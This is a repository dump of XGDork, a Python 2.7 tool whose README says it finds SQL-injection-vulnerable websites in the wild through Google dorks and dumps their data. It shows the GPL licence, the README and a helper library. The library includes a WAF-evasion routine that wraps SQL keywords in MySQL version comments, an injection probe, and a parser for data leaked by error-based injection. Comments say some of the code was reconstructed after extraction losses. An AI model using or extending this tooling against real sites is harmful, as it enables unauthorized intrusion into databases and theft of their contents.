├── LICENSE
├── README.md
├── XGDlib.py
├── XGDork.py
├── XGDtoolz.py
├── XGDumper.py
├── agents.txt
├── gd_data.txt
├── gd_ext.txt
├── gd_keywords.txt
├── gd_namespage.txt
├── gd_params.txt
└── version.txt

/LICENSE:
--------------------------------------------------------------------------------

GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007

Copyright (C) 2007 Free Software Foundation, Inc.
Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.

Preamble

The GNU General Public License is a free, copyleft license for software and other kinds of works.

The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. We, the Free Software Foundation, use the GNU General Public License for most of our software; it applies also to any other work released this way by its authors. You can apply it to your programs, too.

When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things.

To protect your rights, we need to prevent others from denying you these rights or asking you to surrender the rights. Therefore, you have certain responsibilities if you distribute copies of the software, or if you modify it: responsibilities to respect the freedom of others.

For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights.

Developers that use the GNU GPL protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License giving you legal permission to copy, distribute and/or modify it.

For the developers' and authors' protection, the GPL clearly explains that there is no warranty for this free software. For both users' and authors' sake, the GPL requires that modified versions be marked as changed, so that their problems will not be attributed erroneously to authors of previous versions.

Some devices are designed to deny users access to install or run modified versions of the software inside them, although the manufacturer can do so. This is fundamentally incompatible with the aim of protecting users' freedom to change the software. The systematic pattern of such abuse occurs in the area of products for individuals to use, which is precisely where it is most unacceptable. Therefore, we have designed this version of the GPL to prohibit the practice for those products. If such problems arise substantially in other domains, we stand ready to extend this provision to those domains in future versions of the GPL, as needed to protect the freedom of users.

Finally, every program is threatened constantly by software patents. States should not allow patents to restrict development and use of software on general-purpose computers, but in those that do, we wish to avoid the special danger that patents applied to a free program could make it effectively proprietary. To prevent this, the GPL assures that patents cannot be used to render the program non-free.

The precise terms and conditions for copying, distribution and modification follow.

TERMS AND CONDITIONS

0. Definitions.

"This License" refers to version 3 of the GNU General Public License.

"Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks.

"The Program" refers to any copyrightable work licensed under this License. Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations.

To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work.

A "covered work" means either the unmodified Program or a work based on the Program.

To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well.

To "convey" a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying.

An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion.

1. Source Code.

The "source code" for a work means the preferred form of the work for making modifications to it. "Object code" means any non-source form of a work.

A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language.

The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it.

The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work.

The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source.

The Corresponding Source for a work in source code form is that same work.

2. Basic Permissions.

All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law.

You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you.

Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary.

3. Protecting Users' Legal Rights From Anti-Circumvention Law.

No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures.

When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures.

4. Conveying Verbatim Copies.

You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program.

You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee.

5. Conveying Modified Source Versions.

You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions:

a) The work must carry prominent notices stating that you modified it, and giving a relevant date.

b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices".

c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. This License gives no permission to license the work in any other way, but it does not invalidate such permission if you have separately received it.

d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so.

A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate.

6. Conveying Non-Source Forms.

You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways:

a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange.

b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge.

c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b.

d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements.

e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d.

A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work.

A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product.

"Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made.

If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM).

The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network.

Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying.

7. Additional Terms.

"Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions.

When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission.

Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms:

a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or

b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or

c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or

d) Limiting the use for publicity purposes of names of licensors or authors of the material; or

e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or

f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors.

All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying.

If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms.

Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way.

8. Termination.

You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11).

However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation.

Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice.

Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10.

9. Acceptance Not Required for Having Copies.

You are not required to accept this License in order to receive or run a copy of the Program. Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so.

10. Automatic Licensing of Downstream Recipients.

Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License.

An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts.

You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it.

11. Patents.

A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. The work thus licensed is called the contributor's "contributor version".

A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License.

Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version.

In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party.

If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. "Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid.

If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it.

A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007.

Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law.

12. No Surrender of Others' Freedom.

If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program.

13. Use with the GNU Affero General Public License.

Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the special requirements of the GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination as such.

14. Revised Versions of this License.

The Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns.

Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU General Public License, you may choose any version ever published by the Free Software Foundation.

If the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program.

Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version.

15. Disclaimer of Warranty.

THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.

16. Limitation of Liability.

IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

17. Interpretation of Sections 15 and 16.

If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee.

END OF TERMS AND CONDITIONS

How to Apply These Terms to Your New Programs

If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms.

To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found.

    Copyright (C)

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see .

Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:

    Copyright (C)
    This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
    This is free software, and you are welcome to redistribute it
    under certain conditions; type `show c' for details.

The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".

You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
.

The GNU General Public License does not permit incorporating your program
into proprietary programs. If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License. But first, please read
.
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# XGDork - ViraX Google Dork Scanner

**WARNING: NEW VERSION! Use XGDork²** here -> https://github.com/E4rr0r4/XGDork-2

SQLi Google Dork Scanner by ViraX @ 2018 - 2019
- for Python 2.7 - compatible with Android (no root) under Termux

A simple, 'naive' Python tool that finds SQLi-vulnerable websites in the wild via Google.

[!] DISCLAIMER: I am not responsible for any illegal acts you commit with this program; it is for educational use only. [!]
- SQL Dork Scanner
- SQL Dumper module (basic)
- Simple Tools

--- Setup ---
- install Python 2.7 / on Termux: 'pkg install python2'
- pip/pip2 install requests
- pip/pip2 install termcolor
- install git / on Termux: 'pkg install git'
- git clone https://github.com/E4rr0r4/XGDork.git
- cd XGDork
- chmod +x XGDork.py (optional)
- python/python2 XGDork.py --help


version: Final-1.0k2-FreeSoftware

- Contributor(s)/Source(s)
  * SQLmap 'agents file' - https://github.com/sqlmapproject/
--------------------------------------------------------------------------------
/XGDlib.py:
--------------------------------------------------------------------------------


# This program is a 'total' free software: you can redistribute it and/or modify - ViraX
# You can quote me as a source.

import os
import sys
import re
import requests
import time
import socket
from random import randint
from termcolor import colored



def block_cutter (string, int_start, int_end):
    # returns string[int_start..int_end], both ends inclusive

    newd = ""

    while (int_start <= int_end):
        newd += string[int_start]
        int_start += 1
    return newd


def focpa (url, param):
    # "focus parameter": returns the URL cut right after the parameter marker
    # (e.g. "id="), so that a payload can be appended to that parameter's
    # value; returns -1 when the marker is not a parameter of the query string
    burl = ""
    i = 0
    ca = 0
    cb = 0
    tmp = ""

    while (i < len(url)):
        if (url[i] == '?' or url[i] == '&'):
            i += 1
            ca = i
            while (i < len(url) and url[i] != param[len(param)-1]):
                i += 1
            if (i >= len(url)):
                # the original indexed past the end of the URL here
                break
            cb = i
            tmp = block_cutter(url, ca, cb)
            if (tmp == param):
                burl = block_cutter(url, 0, cb)
                return burl
        i += 1

    return -1


def parserDump (data, mod):
    # pulls the value(s) that the error-based payloads leak between the
    # '(^#^)' and '(V#V)' markers out of an error page, e.g.
    #   Duplicate entry '(^#^)5.5.5(V#V)1' for key 'group_key'
    # a value ends at the next '(' or '<', at "' for key" or at the end of
    # the data; with mod == 1 only the first value is returned
    data_list = re.findall(r"\(\^#\^\)(.*?)(?:\(|<|' for key|$)", data, re.S)

    if (mod == 1):
        return data_list[:1]

    return data_list



def dump_page (string):
    # turns the page option ("N" or "range(first,last)") into its number(s)
    dump = []
    string = string.replace("range(", '')
    string = string.replace(')', '')
    dump = string.split(',')

    return dump



def rand_agent ():
    # picks a random User-Agent from the sqlmap agents file; the first five
    # lines (the file's header) are never used

    agent_file = open('agents.txt', 'r')
    agents = agent_file.read().splitlines()
    agent_file.close()
    rnd_n = randint(5, len(agents)-1)
    return agents[rnd_n]



def ipuser ():
    # looks up the public IP address of this host through iplocation.net

    ca = 0
    cb = 0

    try:
        ipreq = requests.get('https://www.iplocation.net/find-ip-address')
        data = ipreq.text.encode('utf-8')

        if (data.find("color:green;'>") > -1):
            ca = data.find("color:green;'>")+len("color:green;'>")
            # NOTE: the end marker the original used to close the value, and
            # the remainder of this function, did not survive the extraction
            # of this copy; the address is assumed to end at the next tag
            cb = data.find("<", ca)
            if (cb > ca):
                return block_cutter(data, ca, cb-1)
    except requests.exceptions.RequestException:
        pass

    return "unknown"



def myParserGSE (greq, bp):
    # extracts candidate result URLs from a search-engine result page
    # (Google mode when bp == -1, startpage mode when bp > 0); returns the
    # sentinel list ["!gsec!"] when Google served its "unusual traffic" page.
    # NOTE: the header of this function (signature and variable set-up) did
    # not survive the extraction of this copy; it is restored here from the
    # way the function is called and the names its body uses.

    urls = []
    i = 0
    ca = 0
    cb = 0
    tmp = ""
    url_found = ""

    if (greq.find("Our systems have detected unusual traffic from your computer network.") > -1):
        print colored(" [!] Google Security Traffic page detected ! < Unusual Traffic >", 'red')
        print colored(" [*] Advice: Change your IP -or- wait 1/2 hours -or- Bypass this ! -or- Try with '-b 1'", 'blue')
        urls.append("!gsec!")
        return urls

    while (i < len(greq)-1):

        # a candidate starts at 'h' (Google) or at 'href="h' (startpage)
        if (greq[i] == 'h' and bp == -1 or (bp > 0 and greq[i] == 'h' and greq[i+1] == 'r')):
            ca = i
            while (i < len(greq)-1 and greq[i] != ':'):
                i += 1
            cb = i
            tmp = block_cutter (greq, ca, cb)

            if (tmp == 'http:' or tmp == 'https:' or (bp > 0 and tmp == "href=\"http:") or (bp > 0 and tmp == "href=\"https:")):

                # the candidate runs up to the next space
                while (i < len(greq)-1 and greq[i] != ' '):
                    i += 1
                cb = i
                if (bp > 0):
                    url_found = block_cutter (greq, (ca+len("href=\"")), cb-2)
                else:
                    url_found = block_cutter (greq, ca, cb)

                # cut at the first of the delimiters Google appends to links
                # (a few HTML tag fragments the original also cut at did not
                # survive the extraction of this copy)
                for delim in ['%252B', '&', '+', ' ', '...', '&L=', '#']:
                    if (url_found.find(delim) > -1):
                        url_found = block_cutter(url_found, 0, url_found.find(delim)-1)

                url_found = url_found.replace('"', '')

                # undo Google's (double) percent-encoding of the query string
                url_found = url_found.replace('%253F', '')
                url_found = url_found.replace('%3F', '?')
                url_found = url_found.replace('%253D', '=')
                url_found = url_found.replace('%2526', '&')
                url_found = url_found.replace('%3D', '=')
                url_found = url_found.replace('%26', '&')

                # drop search-engine assets and sites that merely talk about
                # SQL injection, and keep only URLs with a query parameter
                # (note: these are substring tests on the whole URL)
                ignored = ['.google.', '.gstatic.', 'injection-sql', 'sql-injection', 'sql-injections', 'sql-dorks', 'dorks', 'hack', 'scribd', 'pastebin', 'stackoverflow', 'over-blog', 'github', 'blogspot', 'facebook', 'moodle.', 'openclassroom', 'cracking.org', 'websec.ca', 'sql_injection', 'injection_sql', 'carding_dork', 'carding-dork', 'hacking', 'vulnerability-lab.com', 'ixquick-proxy.com', 'forum.phpdebutant', 'youtube.com', 'startpage']
                if (not any(url_found.find(word) > -1 for word in ignored)):
                    if ((url_found.find('http:') > -1 or url_found.find('https:') > -1) and url_found.find('=') > -1 and url_found.find('?') > -1):
                        urls.append(url_found)
                        print (" [!] URL Found: "+url_found)

        i += 1

    nurls = list(set(urls))
    return nurls


def sbws (string):
    # "simple bypass WAF string": spaces become '+', and SQL keywords are
    # wrapped in MySQL version comments (/*!50000...*/), which MySQL 5.0+
    # executes but a naive keyword filter may not recognise.
    # The replacements run in order, so longer keywords come before the
    # shorter ones they contain (UNHEX before HEX, GROUP_CONCAT and CONCAT_WS
    # before CONCAT, ORDER and FLOOR before OR, RAND before AND); the
    # original had HEX before UNHEX and CONCAT before CONCAT_WS, and left
    # the GROUP comment unterminated.

    string = string.replace(" ", "+")
    keywords = [
        ("UNION", "/*!50000UnIoN*/"),
        ("ORDER", "/*!50000OrDeR*/"),
        ("GROUP_CONCAT", "/*!50000GrOuP_CoNcAt*/"),
        ("CONCAT_WS", "/*!50000CoNcAt_Ws*/"),
        ("CONCAT", "/*!50000CoNcAt*/"),
        ("CHAR", "/*!50000ChAr*/"),
        ("FROM", "/*!50000FrOm*/"),
        ("WHERE", "/*!50000WhErE*/"),
        ("RAND", "/*!50000RaNd*/"),
        ("FLOOR", "/*!50000FlOoR*/"),
        ("UNHEX", "/*!50000UnHeX*/"),
        ("HEX", "/*!50000HeX*/"),
        ("LIMIT", "/*!50000LiMiT*/"),
        ("ELT", "/*!50000ElT*/"),
        ("SLEEP", "/*!50000SlEeP*/"),
        ("SELECT", "/*!50000SeLeCt*/"),
        ("COUNT", "/*!50000CoUnT*/"),
        ("@@version", "/*!50000@@VeRsIoN*/"),
        ("version()", "/*!50000VeRsIoN()*/"),
        ("database()", "/*!50000DaTaBaSe()*/"),
        ("TABLE_NAME", "/*!50000TaBlE_NaMe*/"),
        ("COLUMN_NAME", "/*!50000CoLuMn_NaMe*/"),
        ("INFORMATION_SCHEMA.TABLES", "/*!50000InFoRmAtIoN_ScHeMa.TaBlEs*/"),
        ("INFORMATION_SCHEMA.COLUMNS", "/*!50000InFoRmAtIoN_ScHeMa.CoLuMnS*/"),
        ("INFORMATION_SCHEMA.PLUGINS", "/*!50000InFoRmAtIoN_ScHeMa.PlUgInS*/"),
        ("TABLE_SCHEMA", "/*!50000TaBlE_ScHeMa*/"),
        ("GROUP", "/*!50000GrOuP*/"),
        ("LIKE", "/*!50000LiKe*/"),
        ("BY", "/*!50000By*/"),
        ("HAVING", "/*!50000HaViNg*/"),
        ("MIN", "/*!50000MiN*/"),
        ("CAST", "/*!50000CaSt*/"),
        ("AS", "/*!50000As*/"),
        ("AND", "/*!50000AnD*/"),
        ("OR", "/*!50000Or*/"),
    ]
    for (word, wrapped) in keywords:
        string = string.replace(word, wrapped)

    return string



def fetch (nurl, headers, timeout):
    # one GET with the optional timeout; returns the body as a byte string
    if (timeout > 0.0):
        req = requests.get(nurl, headers=headers, timeout=timeout)
    else:
        req = requests.get(nurl, headers=headers)
    return req.text.encode('utf-8')


def waf_probe (burl, headers, timeout):
    # appends a harmless AND CONCAT(CHAR(...)) marker (the bytes spell
    # "XGDORK\r\n") and looks for a mod_security / 403 style reply;
    # returns 1 when a simple WAF seems to sit in front of the application
    nurl = burl
    nurl += "1984 AND CONCAT(CHAR(088,071,068,079,082,075,013,010))"
    data = fetch(nurl, headers, timeout)
    if (data.find("Mod_Security") > -1 or data.find("You don't have permission ") > -1):
        print colored(" [!] simple WAF Detected ! Others potential security ... ", 'red')
        return 1
    return 0


